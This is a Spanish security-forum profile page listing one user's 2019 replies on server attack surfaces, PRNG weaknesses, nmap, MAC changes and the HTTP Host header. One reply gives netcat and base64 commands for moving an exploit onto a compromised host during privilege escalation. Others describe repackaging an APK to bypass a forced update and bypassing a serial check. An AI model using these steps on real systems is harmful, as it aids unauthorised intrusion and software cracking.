• Inicio
  • Blog
  • Wargames
  • Buscar
  • Ingresar
  • Registrarse

    • Hack x Crack - Comunidad de Seguridad informática »
    • Perfil de animanegra »
    • Mostrar Mensajes »
    • Mensajes
    El evento Bitup2019 necesita tu ayuda! Click aquí para saber más
    • Información del Perfil
      • Resumen
      • Mostrar Estadísticas
      • Mostrar Mensajes...
        • Mensajes
        • Temas
        • Adjuntos

    Mostrar Mensajes

    Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

    • Mensajes
    • Temas
    • Adjuntos

    Mensajes - animanegra

    Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 82
    1
    Cracking / Re:Hackear SSL. Ayuda
    « en: Julio 26, 2019, 12:49:19 pm »
    Cita de: rulas en Julio 22, 2019, 04:13:55 pm
    Hola,

    Soy ingeniero de telecomunicaciones, y me estoy metiendo en el mundillo de la seguridad y el cracking web. El caso es que estoy intentando crackear
    una web en la que el unico puerto abierto es el "443/tcp open  ssl/ssl Apache httpd (SSL-only mode)" y estoy un poco perdido. Es posible hackearlo?

    Hola, soy repartidor de butano. Por la información que das es un servidor apache por lo que será un servidor web. Los fallos que puedes explotar con esa premisa (si es que los tiene) son fallos del sistema operativo a nivel de driver, si tiene puesto un firewall fallos del firewall, fallos del servidor apache, y fallos en los sistemas web programados probablemente en php, ya que se trata de un apache. Si el apache utiliza un sistema de almacenamiento de bases de datos tambien puedes intentar ataques a la base de datos.
    A partir de ahi a aprender. Que tengas esos vectores de posible ataque no quiere decir que sea vulnerable si no que si hay algo mal configurado o programado y los fallos lo permiten podrás hacer algo. Bueno y si tienes
    acceso físico al servidor tambien tienes ese vector de ataque.

    Contestar a si es posible hackearlo pues dependerá. La información que das es tan genérica como decir, hay una caja fuerte y tiene una puerta ¿Es posible entrar en ella? bueno pues depende... :)

    modo paternalista on...

    Por otro lado, mas te vale que el sistema al que quieres entrar sea tuyo o te hayan dado permiso. Si no, despues vienen los lloros. Por norma aqui cuando se hacen esas preguntas se da por supuesto que
    el sistema es tuyo o tienes permisos tenlo en cuenta, porque las técnicas que te podrán decir puede que ayuden a verificar la seguridad, serán tecnicas de pentesting que no van en la dieccion de hacer cosas ilegales.
    Por analogía, te pueden decir que tires un ladrillo a la ventana de una tienda para llevarte algo de dentro, pero evidentemente si no tienes permiso del dueño de la tienda o la tienda no es tuya no es muy
    buena idea aunque sea una forma sencilla de llevarte lo que deseas de la tienda.

    modo paternalista off...

    ¿Sabes algo de servidores, de Linux (porque no se sabe que SO es el servidor, teniendo un apache por estadística probablemente sea un linux) y de programación de servidores?
    ¿Que hay en el puerto?¿Hay una aplicacion web?¿En que está programado? ¿Tiene sistema de login? ¿Cual es el sistema operativo del servidor físico? ¿Cuales son las versiones de los servidores, apache en este caso?
    A partir de contestar a estas preguntas igual se te puede orientar.

    un saludo.

    2
    Dudas Generales / Re:bbs
    « en: Junio 11, 2019, 10:53:32 am »
    Mira un poco por aqui:
    https://www.fidonet.org/

    Tienes una copia de las BBS de antaño en la url:
    textfiles.com
    Con monton de información parcialmente útil o inutil del todo. :P Naa, es curioso ver todo eso.

    3
    Dudas Generales / Re:write up vulhub
    « en: Junio 03, 2019, 10:08:32 am »
    Deja el link de la iso de vulhub y si tiene tiempo alguien igual se la mira y te puede ayudar.

    4
    Hacking / Re:Escalado de privilegios
    « en: Mayo 29, 2019, 02:51:54 pm »
    Citar
    únicamente tengo que indicar ./nombre_fichero, no?

    Pues no se, mira la documentación del exploit específico. Pero normalmente un exploit de local privilege escalation te permite estando en el ordenador en una consola ejecutar el comando y que te abra una consola de administrador desde la que ejecutar comandos como superusuario.

    ¿Lo has compilado en el mismo kernel que la máquina objetivo? Mismo procesaor, etc... el exploit ese me suena que era solo para un kernel concreto y para 64 bits.

    5
    Hacking / Re:Escalado de privilegios
    « en: Mayo 29, 2019, 10:12:01 am »
    Cita de: sancand en Mayo 28, 2019, 10:56:02 pm
    en el momento de ejecutar me indica Invalid argument. ¿Alguna idea?

    ¿Has probado a compilar el exploit de forma estática?

    Citar
    Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

    Para copiar un archivo de remoto a local tienes muchas opciones, desde un wget como te comentan, un scp si tiene instalado, utilizando netcat y una redireccion (ejecutas en tu equipo: nc -l -p PUERTO < archivo.exe y en el otro: nc TUIP PUERTO > archivo.exe). Puedes tambien abrir una consola ejecutar "cat archivo.exe | base64" y copiar y pegar de la consola para luego en la máquina remota donde tienes  que poner "echo 'TEXTOCOPIADO' | base64 -d". Hay más opciones, pero estas son unas cuantas.

    6
    Cracking / Re:sacar el serial de registro para este programa hecho en delphi
    « en: Mayo 15, 2019, 11:14:04 am »
    No se si te servirá, pero hay por ahi un crackme explicado paso a paso con un programa en delphi. Igual puedes hacer un proceso parecido para saltarte la comprobación del serial que te pide.
    https://backtrackacademy.com/articulo/resolver-el-reto-engendrito-con-el-decompilador-de-delphi

    7
    Cracking / Re:Ghidra
    « en: Mayo 11, 2019, 01:26:19 pm »
    Y al parecer permitía RCE y esas cosas. Bug o feature para la NSA :P

    https://threatpost.com/nsa-ghidra-bug-rce/142937/

    8
    Dudas Generales / Re:Que es por azar
    « en: Abril 30, 2019, 09:30:04 am »
    En un lenguaje imperativo, osea que los que se ejecuta depende de las variables de entrada y que siempre se ejecuta lo mismo dando el mismo resultado, si, la generación de números aleatorios es algo problemática. Los ordenadores no hacen números aleatorios, hacen cadenas grandes de números pseudoaleatorios, se les introduce una semilla y a partir de esta empieza una generación de una serie definida a partir de dicha semilla.
    Eso significa que si consigues la semilla, consigues toda la secuencia de números aleatorios. Esto viene por la imposibilidad de un sistema basado en reglas definidas de generar una salida diferente para las mismas variables de entrada. Hay sistemas que han usado semillas basadas en el timestamp, una de las formulas simples es usar el timestamp como semilla, para generar numeros de entrada para sistemas de seguridad. Y se han terminado por romper de forma sencilla ya que simplemente habia que tener en cuenta el rango de tiempo en el que se hacía la petición y se probaban semillas con todos los segundos dentro del mismo minuto.
    Hubo un problema gordisimo por ejemplo en 2006 con debian que se flipo haciendo su propio sistema de numeros pseudoaleatorios, y todas las claves generadas (normalmente para el ssh) podían predecirse con lo que hubo un problema de seguridad brutal.
    En resumen, cuidadito con pensar que los números aleatorios que genera un ordenador son realmente aleatorios. Y cuidadito con usar esas secuencias de la forma correcta, los números pseudoaleatorios ofrecen una herramienta que permite desde una semilla generar números con mucha entropia, pero no significa que si generamos numeros usando distintas semillas, una semilla para cada número como hacen algunos genios, se cumpla que entre ellos tengan entropia. Es un error bastante común.

    9
    C / C++ / Re:[ayuda] Clases
    « en: Abril 16, 2019, 11:52:55 am »
    Es el constructor de la clase y es la que permite que cuando se construye un objeto nuedo de la clase Hora este tenga un espacio en memoria y probablemente defina valores para los atributos hora, minuto y segundo. Pero eso dependerá de su implementación interna.
    Cuando haces un new, en realidad estas llamando al constructor de la clase.

    10
    Dudas Generales / Re:Escaneo de mi red
    « en: Marzo 31, 2019, 10:37:36 pm »
    La forma mas sencilla igual es utilizando nmap. Por ejemplo imaginemos que tu red local es la 192.168.1.0/24 pues ejecutaremos el siguiente comando:

    Código: [Seleccionar]
    nmap -sP 192.168.1.0/24

    Pero vamos que lo suyo igual sería conectarte a la interfaz de gestion del router y ahí te saldrán.

    11
    Redes (WAN, LAN, MAN, CAM, ...) / Re:como conectarse de manera anonima a una wifi
    « en: Marzo 27, 2019, 12:37:27 pm »
    Entiendo que te refieres a la MAC. En general nadie mira la MAC en un router y no se suelen almacenar, pero siempre puede cambiar la MAC (con ifconfig en linux o con las propiedades del dispositivo en el panel de control de windows). Eso sí, tienes un monton de formas más de que te identifiquen en base a el uso de la red a nivel de aplicación. Creo que la principal forma de identificación se basa más en las capas de arriba (aplicación) que en las de abajo (enlace).

    En resumen, no te sirve de nada preocuparte por cambiar la MAC si después visitas tu correo o tu perfil de facebook. ^^

    12
    Dudas Generales / Re:como puedo abrir un juego en apk que me obliga a actualizar
    « en: Marzo 22, 2019, 10:51:09 am »
    LInk a la pagina del desarrollo: https://ibotpeaches.github.io/Apktool/

    Link a la url de download, es un programa java así que tendras que tener el JRE de java instalado para tu sistema operativo: https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.4.0.jar

    Link a la documentacion: https://ibotpeaches.github.io/Apktool/documentation/


    13
    Dudas Generales / Re:como puedo abrir un juego en apk que me obliga a actualizar
    « en: Marzo 21, 2019, 07:38:24 pm »
    Igual puedes, desempaquetarlo y volverlo a empaquetar con otra firma y nombre con lo que el sistema android no detecte que es un programa que necesite de actualización.
    apktool te permite hacer ese tipo de cosas. apktool -d y -b para desempaquetar y volver a empaquetar. Cambias el nombre en el manifest al empaquetar lo firmaras con tu firma privada y ya. Puede que eso funcione.

    14
    Dudas Generales / Re:Cual es el o los mejores y màs completos scanner de vulnerabilidades web ?
    « en: Marzo 18, 2019, 10:47:29 am »
    ¿Cual es el mejor escaner web?, dices mientras clavas en mi pupila tu pupila azul.
    ¿Cual es el mejor escaner web? ¿Y tú me lo preguntas?
    El mejor escaner web... eres tú.

    Puedes mirar W3AF, OpenVAS y Nessus pero no olvides que la parte más importante para poder entrar en un sistema es la enumeración.
    Recuerda también que los scanners de vulnerabilidades son para lo que son, pentesting. Si por algún casual se te ocurre la idea de utilizarlos para cualquier cosa que no sea testear con permiso no es nada sano utilizarlos por lo evidente.

    15
    Dudas Generales / Re:acceder a pagina por su ip
    « en: Marzo 14, 2019, 04:32:37 pm »
    Su IP ya la sabes. Es la que resuelve el nombre de dominio. Me temo que en algo me he explicado mal pero no llego a ver en que.

    Tu cuando accedes a cualquier página no accedes usando el nombre nunca, solo la IP. De hecho el navegador internamente esta enviando una peticion a la IP y no al nombre de dominio. Bueno en realidad primero resuelve la IP en el servidor DNS y despues contacta con la IP.

    El problema reside en que el navegador va a poner como Host (cabecera http no confundir con cabecera IP) el servidor al que estamos intentando contactar. Esto es fácilmente emulable con nc (creo que se verá mejor ya que ahi hay que meter toda la cabecera a mano). Si por ejemplo usamos nc para contactar de esta forma (tenemos que escribir en consola lo que se ve aquí):

    Código: [Seleccionar]
    [email protected]:~/nc 31.220.2.74 80
    GET /Paginas/VariationRoot.aspx HTTP/1.0
    Host: 31.220.2.74


    El servidor devuelve una página de error (tiene virtual hosts y ese nombre de host no lo tiene relacionado con ningun recurso a mostrar):

    Código: [Seleccionar]
    HTTP/1.1 500 Internal Server Error
    Server: nginx
    Date: Thu, 14 Mar 2019 15:24:13 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 8554
    Connection: close
    Cache-Control: private
    X-AspNet-Version: 2.0.50727
    X-Powered-By: ASP.NET
    MicrosoftSharePointTeamServices: 14.0.0.7015
    X-MS-InvokeApp: 1; RequireReadOnly

    <html>
        <head>
            <title>No se encontró la aplicación web en http://31.220.2.74. Compruebe que escribió la dirección URL correctamente. Si la dirección URL da servicio al contenido existente, puede que el administrador del sistema necesite agregar una nueva asignación de solicitud de dirección URL a la aplicación deseada.</title>
            <style>
    ....

    En cambio si hacemos lo mismo especificando el Host en la cabecera (fijate que es la misma IP y mismo puerto, estamos cambiando lo que enviamos en la cabecera http, en concreto la variable Host):

    Código: [Seleccionar]
    [email protected]:~/nc 31.220.2.74 80
    GET /Paginas/VariationRoot.aspx HTTP/1.0
    Host: www.sgae.es


    Lo que nos devuelve es una contestacion http válida:

    Código: [Seleccionar]
    HTTP/1.1 302 Found
    Server: nginx
    Date: Thu, 14 Mar 2019 15:29:00 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 141
    Connection: close
    Cache-Control: private
    Location: http://www.sgae.es/es-ES
    SPRequestGuid: 4ed91092-3f73-47d6-8197-fac78b475c17
    X-SharePointHealthScore: 0
    X-AspNet-Version: 2.0.50727
    X-Powered-By: ASP.NET
    MicrosoftSharePointTeamServices: 14.0.0.7015
    X-MS-InvokeApp: 1; RequireReadOnly

    <html><head><title>Object moved</title></head><body>
    <h2>Object moved to <a href="http://www.sgae.es/es-ES">here</a>.</h2>
    </body></html>

    Podriamos tener muchos nombres de domino vinculados a nuestra IP (de hecho sería irrelevante tener o no el nombre de dominio si la peticion web se construye de forma correcta), la misma IP en todos los dominios. Pero damos un recurso u otro (osea una pagina web u otra) dependiendo el nombre que nos pongan a nivel de aplicacion, a nivel http. Osea el valor que tiene la variable Host que esta en nivel de aplicacion, osea encima del nivel de transporte (TCP) y encima del nivel de red (IP).

    ¿Se entiende ahora?

    Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 82
    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more